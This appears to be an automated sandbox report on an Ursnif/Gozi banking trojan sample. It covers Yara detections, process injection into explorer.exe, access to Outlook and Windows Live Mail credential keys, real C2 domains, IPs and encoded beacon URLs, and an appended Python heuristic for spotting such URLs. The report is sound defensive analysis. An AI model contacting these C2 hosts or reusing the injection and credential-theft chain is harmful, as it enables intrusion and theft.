Source: Yara match File source: 00000001.00000003.362409571.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.398940574.0000000004C6B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000003.464100297.000002179E910000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.473286008.0000000002AD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.629508039.000000000679E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362501622.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362480640.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362433705.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362526268.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.454805795.000002746FF10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.622819473.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362379436.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.477760036.000000000089E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5292, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 5720, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
Tries to steal Mail credentials (via file access)
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.362515361.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.475600162.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362460411.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.456841690.0000000000470000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362409571.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.398940574.0000000004C6B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000003.464100297.000002179E910000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.473286008.0000000002AD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.629508039.000000000679E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362501622.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362480640.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362433705.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362526268.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.454805795.000002746FF10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.622819473.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362379436.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.477760036.000000000089E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5292, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 5720, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY

Behavior Graph:

Behavior Graph ID: 343315; Sample: crypt_3300.dll; Startdate: 22/01/2021; Architecture: WINDOWS; Score: 100. Reconstructed from the graph export: indentation shows parent and child, "(injected)" marks a process that was not started by the chain but received code, and signatures attached to a node are given in brackets.

Top-level signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures. Top-level DNS: resolver1.opendns.com.

mshta.exe  [Suspicious powershell command line found]
    powershell.exe  [Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); 2 other signatures]
        dropped: C:\Users\user\AppData\Local\...\rgcvdt5c.0.cs (UTF-8); C:\Users\user\AppData\...\czjkgrnh.cmdline (UTF-8)
        explorer.exe (injected)  [Tries to steal Mail credentials (via file access); Changes memory attributes in foreign processes to executable or writable; Modifies the context of a thread in another process (thread injection); Disables SPDY (HTTP compression, likely to perform web injects)]
            contacts: c56.lepini.at; api3.lepini.at
        csc.exe
            dropped: C:\Users\user\AppData\Local\...\czjkgrnh.dll (PE32)
            cvtres.exe
        csc.exe
            dropped: C:\Users\user\AppData\Local\...\rgcvdt5c.dll (PE32)
            cvtres.exe
        conhost.exe
loaddll32.exe
    regsvr32.exe  [Detected Gozi e-Banking trojan; Allocates memory in foreign processes; Maps a DLL or memory area into another process; 2 other signatures]
        control.exe  [Maps a DLL or memory area into another process; Creates a thread in another existing process (thread injection)]
    cmd.exe
        iexplore.exe
            iexplore.exe  contacts: img.img-taboola.com; tls13.taboola.map.fastly.net (151.101.1.44, port 443; FASTLYUS, United States); 7 other IPs or domains
            iexplore.exe  contacts: api10.laptok.at (45.138.24.6; SPECTRAIPSpectraIPBVNL, Turkey)
            iexplore.exe
            iexplore.exe

Contacted Public IPs

IP            Domain   Country        ASN    ASN Name                Malicious
45.138.24.6   unknown  Turkey         62068  SPECTRAIPSpectraIPBVNL  true
151.101.1.44  unknown  United States  54113  FASTLYUS                false

Contacted Domains

Name IP Active
contextual.media.net 2.18.68.31 true
tls13.taboola.map.fastly.net 151.101.1.44 true
hblg.media.net 2.18.68.31 true
c56.lepini.at 45.138.24.6 true
lg3.media.net 2.18.68.31 true
resolver1.opendns.com 208.67.222.222 true
api3.lepini.at 45.138.24.6 true
api10.laptok.at 45.138.24.6 true
web.vortex.data.msn.com unknown unknown
www.msn.com unknown unknown
srtb.msn.com unknown unknown
img.img-taboola.com unknown unknown
cvision.media.net unknown unknown

Contacted URLs

Each entry lists: Name; Malicious; Antivirus Detection; Reputation

http://api3.lepini.at/api1/TZTh6_2BkS3c6X/g2npKVRL7cED2dW4yfoz7/1IAgoDfDBaFBh7Kf/s6YPUhhW_2FFOZ4/UfzmASW14dw3GpBMgd/QQTnLy2bn/m47chdfHlbOoStOxiBbF/PVT2YFBWKLhFbou4dcn/rE5edFIASJWWcLmRPujXLx/YI4PYsQdo9LaX/3eFG1EEZ/Sr_2BcwaypXnMHBWu5GiCkg/zhC1mAh91E/nklp0T0h9PwUy8pf3/AvjhI9VAq5aQ/c4y8dg0dcfo/9agKfUuutMqiH4/39h5RIbncwwhgCP2Fp4X_/2F1RiD0H_2BsV2ed/FGqO7Z8iv/B
  Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown
http://api3.lepini.at/api1/yZN5x8AU1/f2l9_2BDk3SyJKCm0b9b/CpWCXqygnlCMKczKhFt/aUvaHjWobYkO38UNm53uP5/5R_2FdKLiGt3q/T_2FbZYT/PDvrYRscHMvAhEzl_2F_2B0/2ikk6uOsaJ/kIfnZQ1ztpC62gFGv/P1mqwU8mDefG/yjBn2N1MiSD/GUZwJFX3oztFwR/onkOOAeBD5WkYQs_2FJht/8kT_2FI3gWn_2BJh/eIjqJ1W8_2FQNm2/Ia6dzqJh5iH4SrCJDK/5Piz1ULur/BABO6rSkLO4ShfMGkMUu/cDt8M0heKfxbEyNRecC/6zuUh3b4d0zydbKfh/4j1x
  Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown
http://api10.laptok.at/api1/CFw0exYOLBE1WOQ6Mn_2BQq/AbMRr9o39B/QrT2i_2BUXb4t9pmn/0lERtiOHlDPB/RvBQZDQ0_2B/XcdNPmTbjSCSkh/LGQj235_2Bzaj4iiE_2BZ/8BOeUfWxCKBDqbW5/305v3z_2Ba56K_2/BNLTprCr0kysMxydNd/QsemKPZya/UWdQMBXIKo51HLvlVE_2/F3BBwvriajKBQr8Ak4R/aT9_2Bw9XoTYMHGlK7kzVs/5gAtMcR1uDZ1K/ECQPLzKd/mvsohtKAfiZi1BZl2tbNMzk/iXtWcjTRcn/5oeMCiT_2BqRqn61F/cBlYM5UfYYiG/Fi3kDfXZStE/6LqXXR_2F0pKhw/O_2Brkkk/_2F
  Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown
http://api3.lepini.at/api1/aswBTjQ4E_2B_/2FPVHi26/F6MnWvHM59IfwFvPMyloaUi/ZdEXHmjh9l/GuUpdE5gAL_2BiwLk/OvzwM3VHZTr_/2Bi5hCWeweE/RDbM_2FDLormln/D5u23sLsNQY4uTSsot2UU/aPO_2FNPBiGyGyqq/s7z4x4ukwrK32If/M9iLwjW2qV3Vr8dNGH/q140lsiDv/T7miJKK0tGN_2FJkKKLX/Cm6sjguLhyPX9arxoel/JMM2f5VEC0AG9Wn6vSkHjJ/nDToUkTHrKvpT/3Wk4CBsP/r0HCE6xNU4Qc_2FkWiw3FEh/ucPyPfDjzrsgr097bADyD/Lr
  Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown
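The four URLs above share a shape that URL reputation alone does not catch (Avira rates each "safe"): an /api1/ prefix, then several hundred characters of letters and digits cut into segments of random length, with the tokens _2B and _2F appearing where a base64 string would carry + and /, and in one case a slash falling inside a token (X_/2F1). Joining the segments and reading _XX as %XX gives a single base64-alphabet blob. The following is an added example, not code from the report or from the sample: a scoring function that applies those traits to the report's own URLs and to a constructed benign URL. The /api1/ prefix is treated as an assumption specific to this report, as is the reading of '_' as a stand-in for '%'; the thresholds are mine.

```python
"""Heuristic for the long, slash-broken C2 URL paths listed above.

Added example, not part of the sandbox report. SAMPLE_URLS holds the four URLs
the report lists plus one constructed benign control. PATH_PREFIX and the
'_' -> '%' reading are assumptions drawn from this report only.
"""
import math
import re
from typing import Dict, List
from urllib.parse import unquote, urlsplit

PATH_PREFIX = "/api1/"      # assumption: the prefix seen in this report
MIN_PATH_LEN = 200
MIN_BLOB_LEN = 100
MIN_ENTROPY = 4.5           # bits per symbol; random base64 text sits near 5.7
_B64 = re.compile(r"[A-Za-z0-9+/]+={0,2}")

SAMPLE_URLS: List[str] = [
    "http://api3.lepini.at/api1/TZTh6_2BkS3c6X/g2npKVRL7cED2dW4yfoz7/1IAgoDfDBaFBh7Kf/s6YPUhhW_2FFOZ4/UfzmASW14dw3GpBMgd/QQTnLy2bn/m47chdfHlbOoStOxiBbF/PVT2YFBWKLhFbou4dcn/rE5edFIASJWWcLmRPujXLx/YI4PYsQdo9LaX/3eFG1EEZ/Sr_2BcwaypXnMHBWu5GiCkg/zhC1mAh91E/nklp0T0h9PwUy8pf3/AvjhI9VAq5aQ/c4y8dg0dcfo/9agKfUuutMqiH4/39h5RIbncwwhgCP2Fp4X_/2F1RiD0H_2BsV2ed/FGqO7Z8iv/B",
    "http://api3.lepini.at/api1/yZN5x8AU1/f2l9_2BDk3SyJKCm0b9b/CpWCXqygnlCMKczKhFt/aUvaHjWobYkO38UNm53uP5/5R_2FdKLiGt3q/T_2FbZYT/PDvrYRscHMvAhEzl_2F_2B0/2ikk6uOsaJ/kIfnZQ1ztpC62gFGv/P1mqwU8mDefG/yjBn2N1MiSD/GUZwJFX3oztFwR/onkOOAeBD5WkYQs_2FJht/8kT_2FI3gWn_2BJh/eIjqJ1W8_2FQNm2/Ia6dzqJh5iH4SrCJDK/5Piz1ULur/BABO6rSkLO4ShfMGkMUu/cDt8M0heKfxbEyNRecC/6zuUh3b4d0zydbKfh/4j1x",
    "http://api10.laptok.at/api1/CFw0exYOLBE1WOQ6Mn_2BQq/AbMRr9o39B/QrT2i_2BUXb4t9pmn/0lERtiOHlDPB/RvBQZDQ0_2B/XcdNPmTbjSCSkh/LGQj235_2Bzaj4iiE_2BZ/8BOeUfWxCKBDqbW5/305v3z_2Ba56K_2/BNLTprCr0kysMxydNd/QsemKPZya/UWdQMBXIKo51HLvlVE_2/F3BBwvriajKBQr8Ak4R/aT9_2Bw9XoTYMHGlK7kzVs/5gAtMcR1uDZ1K/ECQPLzKd/mvsohtKAfiZi1BZl2tbNMzk/iXtWcjTRcn/5oeMCiT_2BqRqn61F/cBlYM5UfYYiG/Fi3kDfXZStE/6LqXXR_2F0pKhw/O_2Brkkk/_2F",
    "http://api3.lepini.at/api1/aswBTjQ4E_2B_/2FPVHi26/F6MnWvHM59IfwFvPMyloaUi/ZdEXHmjh9l/GuUpdE5gAL_2BiwLk/OvzwM3VHZTr_/2Bi5hCWeweE/RDbM_2FDLormln/D5u23sLsNQY4uTSsot2UU/aPO_2FNPBiGyGyqq/s7z4x4ukwrK32If/M9iLwjW2qV3Vr8dNGH/q140lsiDv/T7miJKK0tGN_2FJkKKLX/Cm6sjguLhyPX9arxoel/JMM2f5VEC0AG9Wn6vSkHjJ/nDToUkTHrKvpT/3Wk4CBsP/r0HCE6xNU4Qc_2FkWiw3FEh/ucPyPfDjzrsgr097bADyD/Lr",
    "https://www.msn.com/en-us/news/world",   # constructed benign control
]


def normalize_path(path: str) -> str:
    """Drop the prefix, join the segments (slashes are inserted at random
    positions, sometimes inside a _2F token), then undo the '_' encoding."""
    body = path[len(PATH_PREFIX):] if path.startswith(PATH_PREFIX) else path.lstrip("/")
    joined = body.replace("/", "")
    return unquote(re.sub(r"_([0-9A-Fa-f]{2})", r"%\1", joined))


def shannon_entropy(s: str) -> float:
    if not s:
        return 0.0
    counts: Dict[str, int] = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def score_url(url: str) -> Dict[str, object]:
    """Return the traits a URL matches; three or more mark it suspicious."""
    path = urlsplit(url).path
    blob = normalize_path(path)
    reasons: List[str] = []
    if path.startswith(PATH_PREFIX):
        reasons.append("api1_prefix")
    if len(path) >= MIN_PATH_LEN:
        reasons.append("long_path")
    if re.search(r"_2[BF]", path):
        reasons.append("underscore_urlencoded")
    if len(blob) >= MIN_BLOB_LEN and _B64.fullmatch(blob) and shannon_entropy(blob) > MIN_ENTROPY:
        reasons.append("base64_alphabet_blob")
    return {"url": url, "suspicious": len(reasons) >= 3, "reasons": reasons, "blob": blob}


if __name__ == "__main__":
    for u in SAMPLE_URLS:
        r = score_url(u)
        print(f"{str(r['suspicious']):5} {','.join(r['reasons']) or '-':60} {u[:60]}...")
```

The normalized blob is only the transport encoding; what it carries is not recovered here, so the value of this check is in proxy logs, where the path shape, not the host, is what a sinkholed or rotated domain cannot hide. The prefix is the weakest trait and is kept separate so that the other three still score a URL without it.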